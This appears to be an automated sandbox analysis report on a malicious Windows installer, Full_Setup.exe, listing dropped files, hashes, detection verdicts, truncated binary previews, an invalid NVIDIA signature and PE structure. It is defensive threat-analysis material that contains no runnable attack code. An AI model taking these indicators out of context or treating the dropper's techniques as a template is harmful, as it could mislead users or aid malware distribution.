SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\2264c7d1

Download File

Process:	C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
File Type:	PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6447207
Entropy (8bit):	7.998441497232368
Encrypted:	true
SSDEEP:	196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
MD5:	B0CB3F07919BEB69B342ED871C6511A9
SHA1:	C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
SHA-256:	AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
SHA-512:	75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
Malicious:	false
Preview:	.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....\|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..\|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.\|3...s.9..&.\|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K\|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................\|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.\|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..\|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe

Download File

Process:	C:\Users\user\Desktop\Full_Setup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	8767044
Entropy (8bit):	7.960152326344281
Encrypted:	false
SSDEEP:	196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
MD5:	51F99EDDD33CC04FB0F55F873B76D907
SHA1:	60CD79359912A9069674CEE3C5C5982A9B01CE82
SHA-256:	16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
SHA-512:	7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: Active_Setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: #Setup.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3t0c3k0r.way.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5by5rkt.cbg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1sq4xfl.y1k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l54yitqp.ivj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Setup.exe, Detection: malicious, Browse Filename: qnUFsmyxMm.exe, Detection: malicious, Browse Filename: Active_Setup.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: #Setup.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: MdhO83N5Fm.exe, Detection: malicious, Browse Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_isdecmp.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35616
Entropy (8bit):	6.953519176025623
Encrypted:	false
SSDEEP:	768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
MD5:	C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:	2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:	31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
SHA-512:	F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3367424
Entropy (8bit):	6.530011244733973
Encrypted:	false
SSDEEP:	98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
MD5:	F809F51E678B7F2E388F8C969EF902C8
SHA1:	DC1C645533E0FD1637BF455BA69A9481E7C4B83A
SHA-256:	8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
SHA-512:	C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ColorStreamLib\is-IOQ9H.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	846325235
Entropy (8bit):	0.13954043794048707
Encrypted:	false
SSDEEP:
MD5:	6A8860A8150021B2D5B9BB707DE4FA37
SHA1:	FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
SHA-256:	0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
SHA-512:	899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	0.5478836361942228
TrID:	Win32 Executable (generic) a (10002005/4) 97.75% Windows ActiveX control (116523/4) 1.14% Inno Setup installer (109748/4) 1.07% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	Full_Setup.exe
File size:	75'917'732 bytes
MD5:	7d0c49430b8eec968a41dd052d0830f6
SHA1:	002790896e4b4fc11a52c7fc1f60c6b23eeb9310
SHA256:	5076058e7be4c726282ad8240653ce29d9719c77a2367427024923d1ca23654f
SHA512:	0eb07fbf5bbae4cd8f65eb889bb67cf3552a07d624b567f7e5b00b02861adbf1f6d69b4286f7106c6a496db97c3ff10064b3ae1b789999c4b3b3a9f2a212d61f
SSDEEP:	24576:AnbbPImgK4brDi4IxgRqzwqNb+Yz7P2P2EMZbG0JEtdqxyt7aw5szZJI11reDD:2HeKh4nqzFuPYdSto8s1mrq
TLSH:	10F7C412FA23ABB19FDAB7652C22DAC858B770289338D4EF15CF3909ED135C643B2515
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x5025d8
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f62b90e31eca404f228fcf7068b00f31

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	27/07/2015 20:00:00 26/07/2018 19:59:59
Subject Chain	CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version:	3
Thumbprint MD5:	F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1:	30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256:	1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial:	14781BC862E8DC503A559346F5DCC518

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 00500930h
call 00007FDD68CC1676h
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007FDD68CC2521h
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
push ebx
call 00007FDD68CC2776h
xor eax, eax
push ebp
push 00502653h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FDD68CC1EC1h
call 00007FDD68DB8D5Ch
mov eax, dword ptr [00500568h]
push eax
push 005005CCh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
call 00007FDD68D34B4Dh
call 00007FDD68DB8DB0h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FDD68DBAD2Bh
jmp 00007FDD68CBCD9Dh
call 00007FDD68DB8B2Ch
mov eax, 00000001h
call 00007FDD68CBD85Eh
call 00007FDD68CBD1E1h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, 005027E8h
call 00007FDD68D34658h
push 00000005h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007FDD68CC2737h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004DACA0h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10e000	0x3840	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x114000	0x6fe00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4862fe4	0x39c0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x113000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10ea80	0x88c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xffdc8	0xffe00	9b35f2bd00fabaa566caa0dc4542ecaf	False	0.4834246763556424	data	6.4888568421228685	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x101000	0x17f4	0x1800	8e0d52126a75001416d71c23878be2c1	False	0.5244140625	data	6.003729381717893	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x103000	0x308c	0x3200	c2acc8e96fc244753abd1d87bb624bc0	False	0.425078125	data	4.3575606000501415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x107000	0x6198	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10e000	0x3840	0x3a00	0e1e8128f777a5ff18a144305a4fb39c	False	0.3108836206896552	data	5.2048781278956655	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x112000	0x3c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x113000	0x18	0x200	9cf98ea6bb17a35d99fa770a2e9a8ff0	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x114000	0x6fe00	0x6fe00	6f0619fa62e1f81e1f9d89ad9f5db558	False	0.5840978526536312	data	7.348644561499074	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x114c44	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x114d78	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x114eac	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x114fe0	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x115114	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x115248	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x11537c	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1154b0	0x4e8	Device independent bitmap graphic, 48 x 48 x 4, image size 1152			0.2945859872611465
RT_BITMAP	0x115998	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.521551724137931
RT_ICON	0x115a80	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5675675675675675
RT_ICON	0x115ba8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4486994219653179
RT_ICON	0x116110	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4637096774193548
RT_ICON	0x1163f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3935018050541516
RT_STRING	0x116ca0	0xec	data			0.6059322033898306
RT_STRING	0x116d8c	0x250	data			0.47466216216216217
RT_STRING	0x116fdc	0x28c	data			0.4647239263803681
RT_STRING	0x117268	0x3e4	data			0.4347389558232932
RT_STRING	0x11764c	0x9c	data			0.717948717948718
RT_STRING	0x1176e8	0xe8	data			0.6293103448275862
RT_STRING	0x1177d0	0x468	data			0.3820921985815603
RT_STRING	0x117c38	0x38c	data			0.3898678414096916
RT_STRING	0x117fc4	0x3dc	data			0.39271255060728744
RT_STRING	0x1183a0	0x360	data			0.37037037037037035
RT_STRING	0x118700	0x40c	data			0.3783783783783784
RT_STRING	0x118b0c	0x108	data			0.5113636363636364
RT_STRING	0x118c14	0xcc	data			0.6029411764705882
RT_STRING	0x118ce0	0x234	data			0.5070921985815603
RT_STRING	0x118f14	0x3c8	data			0.3181818181818182
RT_STRING	0x1192dc	0x32c	data			0.43349753694581283
RT_STRING	0x119608	0x2a0	data			0.41964285714285715
RT_RCDATA	0x1198a8	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x121b90	0x10	data			1.5
RT_RCDATA	0x121ba0	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x1233a0	0x6bc	data			0.6467517401392111
RT_RCDATA	0x123a5c	0x5b10	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows	English	United States	0.3255404941660947
RT_RCDATA	0x12956c	0x125	Delphi compiled form 'TMainForm'			0.7508532423208191
RT_RCDATA	0x129694	0x3a2	Delphi compiled form 'TNewDiskForm'			0.524731182795699
RT_RCDATA	0x129a38	0x320	Delphi compiled form 'TSelectFolderForm'			0.53625
